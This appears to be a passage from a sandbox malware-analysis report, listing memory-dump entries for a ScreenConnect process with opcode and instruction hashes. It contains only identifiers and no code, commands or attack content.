                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 06fb3da5df6a812977884b7a533d2e5e3483a04b4fa36ace5f8f711fb06d52c8
                                                                                              • Instruction ID: 62a541ac882257548eea2ab8b8f9a0181689590e819bb86be508e0db3675d0b9
                                                                                              • Opcode Fuzzy Hash: 06fb3da5df6a812977884b7a533d2e5e3483a04b4fa36ace5f8f711fb06d52c8
                                                                                              • Instruction Fuzzy Hash: 1631C022A4F7C94FE7A797B94C294603FB0EF5366074E01EBC498CB1A7D958684A8352
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 86cd2b7fa62e1123187a471b93cb3f1350bea98934fd7ee7ea0c5e7c6a1d9c4b
                                                                                              • Instruction ID: f529f91e303b8e0546b16dfee249d15030e4fdfe3c0001c833fc6130e08f991c
                                                                                              • Opcode Fuzzy Hash: 86cd2b7fa62e1123187a471b93cb3f1350bea98934fd7ee7ea0c5e7c6a1d9c4b
                                                                                              • Instruction Fuzzy Hash: D631D892A1FACA4FE7B7677C88295543FB0EF5255075A85FFC088CB0E3D9086C068341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0ae0946bd3a32ba6cc8788a19f30f58217d7e765dabc1e383ce2d04f9287da50
                                                                                              • Instruction ID: f83e537925273ff001360294aba8829f66086695178f1f4521a0bba9c426ed81
                                                                                              • Opcode Fuzzy Hash: 0ae0946bd3a32ba6cc8788a19f30f58217d7e765dabc1e383ce2d04f9287da50
                                                                                              • Instruction Fuzzy Hash: C0318012B0E99B1FE765B66C74758E97790DF81324B0A03F7D49CCA0EBDD189A428381
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 84b371d14842d7d1d46b7e65a465666a9236e43cba7301c0684f63cff73afa12
                                                                                              • Instruction ID: d9084928848eb6f3b064c72aacab0ae46dc16de9beda386a24f98ff571e0497f
                                                                                              • Opcode Fuzzy Hash: 84b371d14842d7d1d46b7e65a465666a9236e43cba7301c0684f63cff73afa12
                                                                                              • Instruction Fuzzy Hash: ED31A230719A4E8FDBA8EB69C4A5A6577E1FF6430174100B9D45EC72A6DE28FD41C740
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3e7529e1ae1ae7bcc16386256648bd0ceda1ded9cb5397d0527a8ee33bfd50a5
                                                                                              • Instruction ID: f07935261beb35e5f229d7f463518dda94de010ab1677f131a159e4a1969e52f
                                                                                              • Opcode Fuzzy Hash: 3e7529e1ae1ae7bcc16386256648bd0ceda1ded9cb5397d0527a8ee33bfd50a5
                                                                                              • Instruction Fuzzy Hash: 3B21361170EE8A4FDB5AA7784C749A53BE1EF9620074A01FBE448CB1BAED18AD458341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eee5802bf6b492a78c3c24cd8c4c26a488f35961b04e6124896224bfb519162e
                                                                                              • Instruction ID: 089ba7e2e92491940c35b2b129d2925263f13350e89b160a954a5462efbae8c8
                                                                                              • Opcode Fuzzy Hash: eee5802bf6b492a78c3c24cd8c4c26a488f35961b04e6124896224bfb519162e
                                                                                              • Instruction Fuzzy Hash: 03210031E0EB8E9FEB55DBA484A46EC7BA0EF45300F5504FAD40DD70A2CE782A49C311
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9f782b8a317a04e49b62eaefd2e2d3d87a3416ec478ba1849c186cc8ead1cbd7
                                                                                              • Instruction ID: 531929072b6c80718949491fe18b331f7a5a942785031ff8a58eb8a62ff3bd45
                                                                                              • Opcode Fuzzy Hash: 9f782b8a317a04e49b62eaefd2e2d3d87a3416ec478ba1849c186cc8ead1cbd7
                                                                                              • Instruction Fuzzy Hash: B531A23180E78A9FD712EFB8D4A1CD5BF70EF0235471906E6D088CB0A3DB24A558C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b196c699e6f34fba82f10326fb788cfb9fdf66b2f22c282449b6dd4b65b978f
                                                                                              • Instruction ID: 3950a2d32afc2570156ef3841000f1297a5116527b42a05519875bade9dcd2a2
                                                                                              • Opcode Fuzzy Hash: 9b196c699e6f34fba82f10326fb788cfb9fdf66b2f22c282449b6dd4b65b978f
                                                                                              • Instruction Fuzzy Hash: A121F831B19E4F4BDF589B6C9469AF973D1FF59344700017AD40EC32AADD39E9518780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8593972f8186be71ac14c2a0773a6756a48c17fca3e9e5b8272a45781b479061
                                                                                              • Instruction ID: bc0eeb1054428d1d7cd8264317139c71c5aeb1a39d05a79ecc1f71630216781a
                                                                                              • Opcode Fuzzy Hash: 8593972f8186be71ac14c2a0773a6756a48c17fca3e9e5b8272a45781b479061
                                                                                              • Instruction Fuzzy Hash: C521C42290E78A9FD752AFB8E471CD57F70EF02358B1A06E7D089CB0A7DA146648C751
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4b6a26133f8593c08a82b12c29288dfbf1640d192d12bcf94241e26d2542fcfa
                                                                                              • Instruction ID: ac93596171a72b072f52593d7523f0f56d3b573dd864c74926b790d033a79df3
                                                                                              • Opcode Fuzzy Hash: 4b6a26133f8593c08a82b12c29288dfbf1640d192d12bcf94241e26d2542fcfa
                                                                                              • Instruction Fuzzy Hash: 93119C31F19A4A0FD754EB6898658F277D0EF9931030506F7D41CC31A6CC2CA9428391
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a4be77c07766cbdc689597cfbff2e5343d520117f6fb616ca1698056ca6f431a
                                                                                              • Instruction ID: ad073359a7483be2b57e04013df00b9c5eb87de21d47aaa4439fbff195d13435
                                                                                              • Opcode Fuzzy Hash: a4be77c07766cbdc689597cfbff2e5343d520117f6fb616ca1698056ca6f431a
                                                                                              • Instruction Fuzzy Hash: 1911E733B1ED0D4AEBE697A86C342FD76A1FF44384F8504BAE45DD31B3DE15A9008645
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f509ff7014a5820264f030ef2591524088f2ed1bb51408aa2ccdfbf6865ea4dc
                                                                                              • Instruction ID: ad1e543e3b162335de5994c17d82b805cbdf3438e9ce172d2faacdf134e4a06d
                                                                                              • Opcode Fuzzy Hash: f509ff7014a5820264f030ef2591524088f2ed1bb51408aa2ccdfbf6865ea4dc
                                                                                              • Instruction Fuzzy Hash: F011B7B6E0EB4C4BDFA6CFA468751A87FB1FF55300F45009AE498D31B3DA25A501CB01
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 51efc632b91f9d9117d8e394443b2d3a25238bebc99a358349408a61741bbbe9
                                                                                              • Instruction ID: e755ba4e150748a19069c42927a161b41254ba03105b4c0ae8b85ed24a204bc9
                                                                                              • Opcode Fuzzy Hash: 51efc632b91f9d9117d8e394443b2d3a25238bebc99a358349408a61741bbbe9
                                                                                              • Instruction Fuzzy Hash: 3D01F922B0ED4E1BDAD8E56D74655A8B3C2EFD822171507B7E41CC32A9ED15DD828780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f9f60cdb241c0326a4a0deaaa1c38a34bed725c75001afa1cc94fcc6dbb22875
                                                                                              • Instruction ID: e3647ef7b6a8012ff5d942e87dcd9de567235a86ed7a99b1636598e097a1b041
                                                                                              • Opcode Fuzzy Hash: f9f60cdb241c0326a4a0deaaa1c38a34bed725c75001afa1cc94fcc6dbb22875
                                                                                              • Instruction Fuzzy Hash: A5118271909A8D8FDF45DF6CC4149ED7BF0FF68315B0502AAD449D7266CB34A944CB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e6113a27253123da86aa44e8ae14ec8846293d9b5aa92358900916ce7ef327c6
                                                                                              • Instruction ID: 61fa25aa72d74dc04b6af022ded772ad1a9467e318f3d93529949349f78f27fb
                                                                                              • Opcode Fuzzy Hash: e6113a27253123da86aa44e8ae14ec8846293d9b5aa92358900916ce7ef327c6
                                                                                              • Instruction Fuzzy Hash: 5701FC21B1CE4A0FDB88EB6C54A99BA77D0EF9822071001F7D81CC71EBDC29D9418380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 29176d31256cfbcf9d87e61f140d5d6d53c3ac02b25d4a880a48b80e2964983b
                                                                                              • Instruction ID: f5a697ffb33b37ad8b188d37d4be9a8a49537e000e45d8881715509096a4518d
                                                                                              • Opcode Fuzzy Hash: 29176d31256cfbcf9d87e61f140d5d6d53c3ac02b25d4a880a48b80e2964983b
                                                                                              • Instruction Fuzzy Hash: 0111E830B1891D8FDF98EB6CD464EB9B3E1FF98301B51007AD41ED32A1DE25A8008B40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ca58c5d1a1ec9b3157ac26788a404c004d72f4641c52e5c943f9cbbe52907a32
                                                                                              • Instruction ID: 36f3d7d65e07e79461fca994adb8813f5d39747591d6000ba44989335910d72b
                                                                                              • Opcode Fuzzy Hash: ca58c5d1a1ec9b3157ac26788a404c004d72f4641c52e5c943f9cbbe52907a32
                                                                                              • Instruction Fuzzy Hash: EA11C615F0EA9B0BF7BA536884B13756AF1DF45240F5A80BEC449C61E7DD6CAD82C301
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e1c22457fc1cbf9d8befcb8439869072ad2dceae62bde1b7d85da533cdda8d42
                                                                                              • Instruction ID: 1a3e5356cd2165337e8780511da5b45e2c8cc75bdd36cf342de003568c064d74
                                                                                              • Opcode Fuzzy Hash: e1c22457fc1cbf9d8befcb8439869072ad2dceae62bde1b7d85da533cdda8d42
                                                                                              • Instruction Fuzzy Hash: 2B118131B09A4A4FDBD9EF58C061A6577E1FF64340B8540A8C44DCB197DE36E941C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 453e79bcf07399172c8ed941d253c011b5a76a56a9b95d077d38584e1ca3290f
                                                                                              • Instruction ID: 988894aa003358f20b08d97b7811c0bbdadfcdc73532be4e1c995c04084cd291
                                                                                              • Opcode Fuzzy Hash: 453e79bcf07399172c8ed941d253c011b5a76a56a9b95d077d38584e1ca3290f
                                                                                              • Instruction Fuzzy Hash: 8E016170909A8D8FCF46DF68C8059E97BF0FF59315B0542A6E448D7261CB749944CB92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0770867f99106a0e208d34dac015db55200ef624da755827dc086a8d10aee7ef
                                                                                              • Instruction ID: 4953144f908778cfd98bcb99a963a6f22279166917f381c9c541be7890fad69e
                                                                                              • Opcode Fuzzy Hash: 0770867f99106a0e208d34dac015db55200ef624da755827dc086a8d10aee7ef
                                                                                              • Instruction Fuzzy Hash: D1116071B09A4A4FDBD9EF58C461B5577E2FF68344B8540A8C44DCB297DE36E901C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c51e3fe78c16fbe14cb6a74f9443e7e141e77ac9b1d4393137554fd2468e04be
                                                                                              • Instruction ID: 77903ebe0a9a1bdd328fd681c4a1853f7da31874fdf0a8574d84dd6b56903238
                                                                                              • Opcode Fuzzy Hash: c51e3fe78c16fbe14cb6a74f9443e7e141e77ac9b1d4393137554fd2468e04be
                                                                                              • Instruction Fuzzy Hash: 7C010C30A14A4E8FDBA4EF589425AAE72E1FF58301F4108BAE41DD32E5DE7569508B80
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3dd8514770bcea6984151fcf90d1cfb04b8505d6c7c267685dd618a65e8dd4e6
                                                                                              • Instruction ID: 9d50a9d9d6408773c6a85fdba0d1592e57dadfbde1a2d176493f9a32d946ea50
                                                                                              • Opcode Fuzzy Hash: 3dd8514770bcea6984151fcf90d1cfb04b8505d6c7c267685dd618a65e8dd4e6
                                                                                              • Instruction Fuzzy Hash: 0B11CA3060EA854FD356F72CD470AB47B90EF02218B1601FFC49DC60E7CD1919498355
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dc9037d49aac5eda7e2a9014a6fdcab7bb9a612e058d71bc9ec86c58d087e8d1
                                                                                              • Instruction ID: 5a12ebb12a68becc49529ff0dfdda5ea1ef420249012f2b09df6cf2e2bd1dc4e
                                                                                              • Opcode Fuzzy Hash: dc9037d49aac5eda7e2a9014a6fdcab7bb9a612e058d71bc9ec86c58d087e8d1
                                                                                              • Instruction Fuzzy Hash: CC01FC6171DD4E0BDB98EA6C4094DB9B3D1EFA822575403B6DC1CC719ADD24DD418340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c9d68a5f818a41d789a564214ce795a0562eb960af9abea07b6c60dab192d720
                                                                                              • Instruction ID: 6caa7ff7863914ba7d74fde465598015f3ca6d32fea5184f1f726dae4fe72b45
                                                                                              • Opcode Fuzzy Hash: c9d68a5f818a41d789a564214ce795a0562eb960af9abea07b6c60dab192d720
                                                                                              • Instruction Fuzzy Hash: A9012812B1DE8E1FEB99977C64349A477D1EF95210B0902F7D40CC71A7E918D9418341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3059754522.00007FFD9B590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B590000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b590000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cdb0a0747292ecb4558d5b9de025a30541bd8f21412b2a71ce298fcd3edb148e
                                                                                              • Instruction ID: b19bdf9dcefa22a61dd8dd00b62648f391072186cbc513238449da19f177b10e
                                                                                              • Opcode Fuzzy Hash: cdb0a0747292ecb4558d5b9de025a30541bd8f21412b2a71ce298fcd3edb148e
                                                                                              • Instruction Fuzzy Hash: F701D12160FA8D0FE3969B7D5C681A07FE1EF5B21130901E7E488CB263E811AC858341
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e19aa334565332be51df90f3b2949c8e1386a864011e247bb6e796ecc80c229b
                                                                                              • Instruction ID: 89ff898ea4ea33bc05dea26f98ea2cf0ff9e825047c67fcab6a5a7960823202c
                                                                                              • Opcode Fuzzy Hash: e19aa334565332be51df90f3b2949c8e1386a864011e247bb6e796ecc80c229b
                                                                                              • Instruction Fuzzy Hash: 68017120B25D4E4FE798DB1C8479BB873D2EF58740F5401B9D45EC72E2DD6A6C018340
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9dbe0be5c27064bd4a039a73d648c8a9ef512ccf88d6f077bdeed8bb52be5033
                                                                                              • Instruction ID: 1cc5377fdb97bdcff9dfa521b017e26558ea79e5d0d1e0e364edb31b5169a623
                                                                                              • Opcode Fuzzy Hash: 9dbe0be5c27064bd4a039a73d648c8a9ef512ccf88d6f077bdeed8bb52be5033
                                                                                              • Instruction Fuzzy Hash: 8FF0F421B25E0A0FDB98EB6C9894A76B3C1FBA831070446BAD41DC32A9DC24E8428380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 05944b7899e1a957a385ec5221252e9ab3905fc3d296fbaa9f6b0c9b1da0dcb0
                                                                                              • Instruction ID: 7edd38a27c8be8f97cc33b96fed474814307280a5961c04d47ad009b37dafced
                                                                                              • Opcode Fuzzy Hash: 05944b7899e1a957a385ec5221252e9ab3905fc3d296fbaa9f6b0c9b1da0dcb0
                                                                                              • Instruction Fuzzy Hash: 4BF02321718D4E0B9F88EB6C5099DFA73C1EB9822071002B7D81CC31EFDC25D9418380
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: b6d1bdf7b8e8496d8f7c3c4a77f9a65306a2e5e5b3f1e0aa366703ad63bfe4ff
                                                                                              • Instruction ID: 3100485a0b46fade9ca36b789e0f73f90d664b13b1f149ddacf74555353d466d
                                                                                              • Opcode Fuzzy Hash: b6d1bdf7b8e8496d8f7c3c4a77f9a65306a2e5e5b3f1e0aa366703ad63bfe4ff
                                                                                              • Instruction Fuzzy Hash: 6A015E31718E4E8FDF94DF2884A066933E2FF6930471501A8D81EC729ADE35E842CB40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8234d96b0d37ff0a13420010179c0a11c89bd0d2c27e4f3f3a4ca523dff5914b
                                                                                              • Instruction ID: cc2fd633cc3b18470d4150d966440f0158db01ad70b4521fb19b32b3c22329e0
                                                                                              • Opcode Fuzzy Hash: 8234d96b0d37ff0a13420010179c0a11c89bd0d2c27e4f3f3a4ca523dff5914b
                                                                                              • Instruction Fuzzy Hash: E9015A30A0890D8FDB98EF18C464BE933E1FF58314F1002AAD80DC7295DA26A982C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eb537558ad628ede3a1237138072e1a51387accd0bd723772eb711b96eba9d33
                                                                                              • Instruction ID: 845ca32ad224134d28cb5804b31907cf0c6ace27b8a9139a035ee765d2016812
                                                                                              • Opcode Fuzzy Hash: eb537558ad628ede3a1237138072e1a51387accd0bd723772eb711b96eba9d33
                                                                                              • Instruction Fuzzy Hash: C0F0C263F1DC1E0BE7F4959CA46567A93C2EBA8AB074653B2D41DC32A4ED18AD8343C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 50504819c664856f6b8a3944965bbee9347f72f1793bbd143e0183c928870ec6
                                                                                              • Instruction ID: 4ded2f748c5ab86e75b1fbd6daf245c1767c3e8d5e541c6d1adc7cb04e28a1ab
                                                                                              • Opcode Fuzzy Hash: 50504819c664856f6b8a3944965bbee9347f72f1793bbd143e0183c928870ec6
                                                                                              • Instruction Fuzzy Hash: FB014F7194EBCD4FDB52DB6888258997FB0FE16311B0A02DBD198CB1A3D314A948C792
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000008.00000002.3050364638.00007FFD9B28A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B28A000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_8_2_7ffd9b28a000_ScreenConnect.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 79968cc527d34301a9e2731a0bdb9c9483763fcbf407e288fabbed7662ace95f
